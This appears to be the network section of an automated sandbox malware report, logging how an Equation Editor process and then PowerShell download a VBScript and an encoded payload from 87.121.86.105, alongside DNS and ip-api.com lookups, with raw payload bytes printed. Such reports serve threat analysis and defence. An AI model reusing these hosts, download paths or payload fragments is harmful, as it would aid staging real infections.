                                                            Dec 1, 2024 14:28:17.376013041 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.376058102 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.378364086 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.378453016 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.378496885 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.380970955 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.381077051 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.381136894 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.383364916 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.383475065 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.383533955 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.384185076 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.384278059 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.384320974 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.385833979 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.385967970 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.386009932 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.387502909 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.387583971 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.387624979 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.389106989 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.389231920 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.389275074 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.390733004 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.390865088 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.390904903 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.392466068 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.392538071 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.392580986 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.394010067 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.394120932 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.394181013 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.395663977 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.395770073 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.395817041 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.397310019 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.397429943 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.397469044 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.398925066 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.399050951 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.399100065 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.400628090 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.400796890 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.400839090 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.402297020 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.402415991 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.402460098 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.403887987 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.404000044 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.404047012 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.405535936 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.405596972 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.405656099 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.407124996 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.407216072 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.407258987 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.443738937 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.443901062 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.443969965 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.444466114 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.444587946 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.444629908 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.446151018 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.446348906 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.446393013 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.447998047 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.448086023 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.448129892 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.449387074 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.449465990 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.449510098 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.451055050 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.451129913 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.451173067 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.452619076 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.452826977 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.452872992 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.454262018 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.454338074 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.454395056 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.455811977 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.455930948 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.455969095 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.458139896 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.458158016 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.458198071 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.459395885 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.459418058 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.459453106 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.460686922 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.460839033 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.460885048 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.462270975 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.539386988 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:18.336273909 CET4916480192.168.2.22208.95.112.1
                                                            Dec 1, 2024 14:28:18.456331015 CET8049164208.95.112.1192.168.2.22
                                                            Dec 1, 2024 14:28:18.456603050 CET4916480192.168.2.22208.95.112.1
                                                            Dec 1, 2024 14:28:18.456773996 CET4916480192.168.2.22208.95.112.1
                                                            Dec 1, 2024 14:28:18.577152014 CET8049164208.95.112.1192.168.2.22
                                                            Dec 1, 2024 14:28:19.604567051 CET8049164208.95.112.1192.168.2.22
                                                            Dec 1, 2024 14:28:19.877136946 CET4916480192.168.2.22208.95.112.1
                                                            Dec 1, 2024 14:28:19.984272957 CET8049164208.95.112.1192.168.2.22
                                                            Dec 1, 2024 14:28:19.984323025 CET4916480192.168.2.22208.95.112.1
                                                            Dec 1, 2024 14:29:02.211296082 CET8049164208.95.112.1192.168.2.22
                                                            Dec 1, 2024 14:29:02.211369038 CET4916480192.168.2.22208.95.112.1
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 1, 2024 14:27:57.747862101 CET5456253192.168.2.228.8.8.8
                                                            Dec 1, 2024 14:27:58.122992039 CET53545628.8.8.8192.168.2.22
                                                            Dec 1, 2024 14:27:58.133052111 CET5291753192.168.2.228.8.8.8
                                                            Dec 1, 2024 14:27:59.144890070 CET5291753192.168.2.228.8.8.8
                                                            Dec 1, 2024 14:27:59.279321909 CET53529178.8.8.8192.168.2.22
                                                            Dec 1, 2024 14:27:59.521244049 CET53529178.8.8.8192.168.2.22
                                                            Dec 1, 2024 14:28:17.819168091 CET6275153192.168.2.228.8.8.8
                                                            Dec 1, 2024 14:28:18.069391012 CET53627518.8.8.8192.168.2.22
                                                            Dec 1, 2024 14:28:18.069605112 CET6275153192.168.2.228.8.8.8
                                                            Dec 1, 2024 14:28:18.319989920 CET53627518.8.8.8192.168.2.22
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Dec 1, 2024 14:27:59.521380901 CET192.168.2.228.8.8.8d028(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 1, 2024 14:27:57.747862101 CET192.168.2.228.8.8.80xf147Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:27:58.133052111 CET192.168.2.228.8.8.80x31a5Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:27:59.144890070 CET192.168.2.228.8.8.80x31a5Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:28:17.819168091 CET192.168.2.228.8.8.80x39d8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:28:18.069605112 CET192.168.2.228.8.8.80x39d8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 1, 2024 14:27:58.122992039 CET8.8.8.8192.168.2.220xf147No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 1, 2024 14:27:58.122992039 CET8.8.8.8192.168.2.220xf147No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:27:59.279321909 CET8.8.8.8192.168.2.220x31a5No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 1, 2024 14:27:59.279321909 CET8.8.8.8192.168.2.220x31a5No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:27:59.521244049 CET8.8.8.8192.168.2.220x31a5No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 1, 2024 14:27:59.521244049 CET8.8.8.8192.168.2.220x31a5No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:28:18.069391012 CET8.8.8.8192.168.2.220x39d8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Dec 1, 2024 14:28:18.319989920 CET8.8.8.8192.168.2.220x39d8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            • 1016.filemail.com
                                                            • 87.121.86.105
                                                            • ip-api.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.224916187.121.86.105803580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampBytes transferredDirectionData
                                                            Dec 1, 2024 14:27:54.537221909 CET318OUTGET /cumconstraints.vbs HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 87.121.86.105
                                                            Connection: Keep-Alive
                                                            Dec 1, 2024 14:27:55.820698023 CET1236INHTTP/1.1 200 OK
                                                            Content-Type: text/vbscript
                                                            Content-Encoding: gzip
                                                            Last-Modified: Fri, 29 Nov 2024 15:28:58 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "05988687342db1:0"
                                                            Vary: Accept-Encoding
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Sun, 01 Dec 2024 13:27:55 GMT
                                                            Content-Length: 59333
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bc fd cf 92 f3 48 96 e6 07 c7 ee 33 93 d9 b7 d1 52 ab b2 32 59 4f b7 66 a6 2d 33 ab ab 55 2d 4d cb 0c 64 57 22 82 40 81 20 19 48 54 51 d6 0b 02 04 49 10 04 41 46 90 2c 26 6f 41 6b dd 83 16 ba 01 dd 87 16 bd e8 b1 b9 13 49 ee bf 73 00 77 66 55 b6 26 46 1a d9 6b ef 3f 06 08 38 dc 8f 9f f3 9c e7 fc f1 ff f3 ff f8 ff bf fc 17 2f bf d0 5f f6 df 4b f3 2b 7c a9 5f f2 97 d1 4b f9 72 7d a9 5e 2e e6 7f cb 97 ce 7c 12 9b 6b fe de fc fe a5 f9 57 f8 d2 f0 59 6d ae 9a bf 9c cd bf 8a 97 c0 7c 52 98 7f fd 92 3b 6d 5f 66 e6 ba e3 cb c3 fc ae cc a7 27 f3 bf ce 7c 1a 9b 6f d6 de 9d a6 e6 b7 fd 55 ea ef fc 65 67 7e 1e 99 ef 45 7a a7 d0 7c 9e 9a 6f 96 66 1c 07 f3 94 ca dc e7 fe 32 36 57 e6 2f 93 e1 4e f6 7f 8d f9 6e 67 46 63 c7 2f 23 5c 9b 3b d6 66 84 72 27 fb bb 34 3f 99 9a 9f 67 e6 9e ed cb ca bc e3 cd fc 9a 9a ab 23 ef 0d a7 e6 7f 81 f9 a6 7d a3 37 f3 79 c6 ac 94 e6 d9 b1 79 13 b9 db c6 dc c5 fe 7f 65 3e b7 cf 08 cd 27 a1 b9 a7 7d a7 d3 70 27 3b 9f 47 f3 59 c0 8c 46 e6 59 57 33 ca d8 fc [TRUNCATED]
                                                            Data Ascii: H3R2YOf-3U-MdW"@ HTQIAF,&oAkIswfU&Fk?8/_K+|_Kr}^.|kWYm|R;m_f'|oUeg~Ez|of26W/NngFc/#\;fr'4?g#}7yye>'}p';GYFYW3+7o!wo]soZ>kJ#0U)r'\U!3wjE45o6WF|*v=\kleahj;6y;9;9s6{0#dmrs="fQ}>(|43#}T+v,k?O#s\nu1:723\egg3.73go>3_3SGyjGy^/ws,4w!WG3hShdF)!4+r|cKOquf~;YIn)akfvs/S1/X+.wkdghod7ycoq KV;v&<IN'0]O%GNF>kX31_Nf$yZeHkw{zj{t[?+vlWz+Vg;|q||m|r@/XyZp'+Km7FcQj5kkuy
                                                            Dec 1, 2024 14:27:55.820888042 CET1236INData Raw: 82 4e b8 b0 de fd 9d ac 16 5c aa 1e 1e b3 6f ac 54 7e 22 d1 4e ce 2b f3 bf 11 7a 2e 42 22 ec 75 76 ee cf c8 ba dc e9 d3 7c 7a 30 3f 8d cc 73 ec 5c 5b 49 9f 99 7b 5a 3d e2 34 b0 d5 83 99 b9 52 e6 e5 61 7e 66 ad d4 87 b9 fa 3a 8c 49 66 3d 40 03 5b
                                                            Data Ascii: N\oT~"N+z.B"uv|z0?s\[I{Z=4Ra~f:If=@[{l33cOHy1+hXyZb~?y<snF]z{*w33vYb3[Ksgazc>[|fpee}AwF_W}EZN+zgB\P5;
                                                            Dec 1, 2024 14:27:55.820904016 CET1236INData Raw: 6d 16 4f 8a 27 6a d7 f0 ec 49 67 67 9e f2 01 4e 3c b1 77 57 e6 ef 23 f6 f1 6d c0 2d 21 7b af 34 b2 1b e3 a3 1d 40 53 2b 33 b6 bb 37 e3 af 68 94 8c 19 5a 63 eb 72 66 3f 62 ff f5 b6 78 cb fb ad e0 3b ee 60 8d 83 91 e8 02 89 71 72 7e 57 39 10 5e e2
                                                            Data Ascii: mO'jIggN<wW#m-!{4@S+37hZcrf?bx;`qr~W9^fleF=ANN|@GJsw2#dZ2o[s0DzBkc~YUc)8zew<pGx\s{9(JohYy}S7>1ze9!lfwW|D6$
                                                            Dec 1, 2024 14:27:55.820920944 CET1236INData Raw: 58 e3 19 76 5a e4 38 d5 38 56 3d bc 5d 8d 4e 1a a3 df 6e 30 3d 15 36 a9 f6 b4 f0 0a 84 f0 80 2f 1e 9b f9 d9 b2 cb 02 e4 bc 8f 0e 5c b1 c3 3b 7c c6 05 68 c9 f2 1a 9f 70 88 0f 4f 6f 9e d0 df a1 46 87 0a 90 db 1d dd e6 b8 ce 1a 3d 68 ed ac c8 5d 86
                                                            Data Ascii: XvZ88V=]Nn0=6/\;|hpOoF=h]W+kj5}|ydlVNsU<"^UjMyC;s9w@DCq<%.v),-Cv6<c*D[4C'<w4Hf$)"Jt7JzXl/:kHq
                                                            Dec 1, 2024 14:27:55.820939064 CET1236INData Raw: 08 eb d3 88 9c 1c d1 4b 57 b8 d9 13 1e 5d eb c9 f9 12 0d 26 ac d5 98 f5 15 1c 50 3f e1 f3 15 d6 60 cf 28 ce ca 65 06 60 8a 87 a7 13 6a 3c e8 94 d5 89 94 87 b8 c3 20 cd 3d ae 3a 63 2f c5 aa 15 ef d8 f4 93 46 e2 9d 24 54 66 94 23 90 fe 99 d5 cd f1
                                                            Data Ascii: KW]&P?`(e`j< =:c/F$Tf#FkEscdtvojQaJ~h~`(G#/F"lrfi|5N:<S!7pvQ_Q;oFBk}[P9N/S6+,\Y
                                                            Dec 1, 2024 14:27:55.820955992 CET1236INData Raw: 98 22 31 a2 43 c4 07 f1 23 61 15 d6 4f f2 f8 2e 64 88 be c2 ce f7 19 61 0b f6 92 f0 a6 17 66 b7 c2 8f 6b 88 ce bb 3b 25 8a 48 0a 8d e8 74 a0 8f 1c be c7 65 80 04 c8 f9 15 bc b9 44 ee 24 0e e2 6c 5f c5 8a 14 ea b9 07 8a f9 32 76 56 2f 09 11 28 21
                                                            Data Ascii: "1C#aO.dafk;%HteD$l_2vV/(!FrU3xE1ENBooXQ7d^L3vvKi+Q&`LQwakfx|Ih_ 5eHl`fMN%/LkeV95)77DPk
                                                            Dec 1, 2024 14:27:55.820974112 CET1236INData Raw: ce b5 fa fe 5d 2b 44 72 ee 96 79 35 86 33 58 f8 b3 e6 69 7f 68 56 8e d8 01 87 ca 6c 46 cc 52 99 82 23 99 61 ad 62 ab 7c c8 ae 5f 80 e5 22 18 9c 11 bc 6c ca 8c 7f 60 77 dc db 45 48 71 0d c2 9b 6b 4f 83 31 48 d8 65 a9 05 cc db 8c a8 e0 05 1f 3b 26
                                                            Data Ascii: ]+Dry53XihVlFR#ab|_"l`wEHqkO1He;&{pGA+>T/o0]%YxJNO{4)i%y'H"(`FB;yduLpyzOb26#Dg4mq`{7w
                                                            Dec 1, 2024 14:27:55.821088076 CET1236INData Raw: 27 0e ef 8c 47 9c 93 51 7b 66 5f 9d b4 ae 3e 1e 10 90 b5 df 53 7d 47 c1 cb 47 cd f0 38 79 77 92 58 6c c1 3c e5 e8 af 48 eb 0b 8f c3 da 9d 55 9a 84 5f 6e a8 2c 90 dc bf 93 27 05 29 f1 d4 54 ab 88 46 6a 27 a7 60 d5 60 d8 c5 d6 43 59 70 d5 9d fd 32
                                                            Data Ascii: 'GQ{f_>S}GG8ywXl<HU_n,')TFj'``CYp2@GoiK8RDupV$\dR.X?C!oc:Rkxss&-a4wD:|W7['YCuYeN_6wzY]0"WSLn{f+&\+;'&3K3
                                                            Dec 1, 2024 14:27:55.821115017 CET1236INData Raw: 8c e3 36 e0 a8 8c 8c e4 0a bf 34 d0 7d 79 44 fa 0a 6f 9e 52 f5 26 5f 61 71 2b fc 8e 1e 71 38 39 17 e9 79 63 26 4f e4 b4 75 cc eb ee 29 6e bc 43 df 46 b0 2b 13 f0 f6 08 2c d8 b1 27 7a 6b 15 6b 14 ec 0a 3b d4 28 7a 3b c3 45 3a e9 0c b0 88 29 5a 68
                                                            Data Ascii: 64}yDoR&_aq+q89yc&Ou)nCF+,'zkk;(z;E:)Zhu~dKP^-\Zs3fqY3Q>Yx:pMcS>pa%>&K9tkpYqS2k43%%1}z/g\]IoywhMvRO9R!
                                                            Dec 1, 2024 14:27:55.821124077 CET1236INData Raw: 37 3d 13 61 c7 3a 26 ac 4c 0c 2b df eb a9 19 7c ac 78 09 16 07 ed 90 df 15 98 dd cf c1 3b 68 97 b8 87 17 91 09 d1 52 9f 83 76 99 6b c6 e7 05 be 3c c3 27 8f 89 b2 fb 35 ec 0f 8d 6a d5 64 f2 8b 7e c9 88 6d 4d 06 cb 30 56 09 b9 20 5b 67 34 db 11 bd
                                                            Data Ascii: 7=a:&L+|x;hRvk<'5jd~mM0V [g44h_C/v+.vk=!Nsy`cdQq['LHJ7r63*:UYS1US|BP-\yF{5z"Zj[:N~_S:]
                                                            Dec 1, 2024 14:27:55.942671061 CET1236INData Raw: 9e 21 8f 31 1d f2 26 c4 96 b6 ec eb fd 60 ad ae 48 6f 0e a3 2e 35 f3 29 f3 1b 32 2f 6e 9e 6a 70 7d a9 32 b2 87 ed eb fb 2d f4 1a 2f 47 e7 8e 98 f7 13 a8 2a 47 67 fb f1 f5 05 55 9c ef 8c 6d c4 6c 1e 18 97 f4 a7 e8 63 7c b2 d3 8e f8 26 73 45 e6 01
                                                            Data Ascii: !1&`Ho.5)2/njp}2-/G*GgUmlc|&sEgnXX9z}GC~w5'p+RRsGW5i3'qIIQ>0jYNKheW%}d_1WQ+=caV+$BJ4^=PB"1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.224916387.121.86.105803784C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 1, 2024 14:28:15.130621910 CET78OUTGET /emmabigssss.txt HTTP/1.1
                                                            Host: 87.121.86.105
                                                            Connection: Keep-Alive
                                                            Dec 1, 2024 14:28:16.437525034 CET1236INHTTP/1.1 200 OK
                                                            Content-Type: text/plain
                                                            Last-Modified: Fri, 29 Nov 2024 10:17:40 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "da5ceeb4742db1:0"
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Sun, 01 Dec 2024 13:28:16 GMT
                                                            Content-Length: 325632
                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lmc
                                                            Dec 1, 2024 14:28:16.437557936 CET224INData Raw: 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c 78
                                                            Data Ascii: QRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3Y
                                                            Dec 1, 2024 14:28:16.437567949 CET1236INData Raw: 6c 4e 48 50 67 41 43 49 67 6f 51 44 2b 49 69 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 76 5a 6d 62 4a 52 33 63 31 4a 48 64 38 41
                                                            Data Ascii: lNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4CMuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiAjLxISPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2
                                                            Dec 1, 2024 14:28:16.437624931 CET1236INData Raw: 41 41 77 54 41 59 45 41 4f 42 51 53 41 38 46 41 4f 42 77 54 41 6b 45 41 54 42 67 55 41 55 45 41 57 42 77 58 41 4d 46 41 57 42 41 41 41 51 6a 41 38 43 41 41 41 41 41 41 41 41 41 41 41 41 51 41 71 44 77 41 6a 7a 46 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAwTAYEAOBQSA8FAOBwTAkEATBgUAUEAWBwXAMFAWBAAAQjA8CAAAAAAAAAAAAQAqDwAjzFAAAAAAAAAAAAACwLADAOoAAAAQCAAAAAABAAAAAAAAAAAAAAAAAAAACAAoBAAAEAABAAAAAAAAAAAAAAAAAAAAAAAACAAAAAABAAAAAAAAAAAAAAAAAAAACAA4AAAAEAABAAAAAAAAAAAAAAAAAAAACAAQBAAAgBgAAAIAAAAQAg
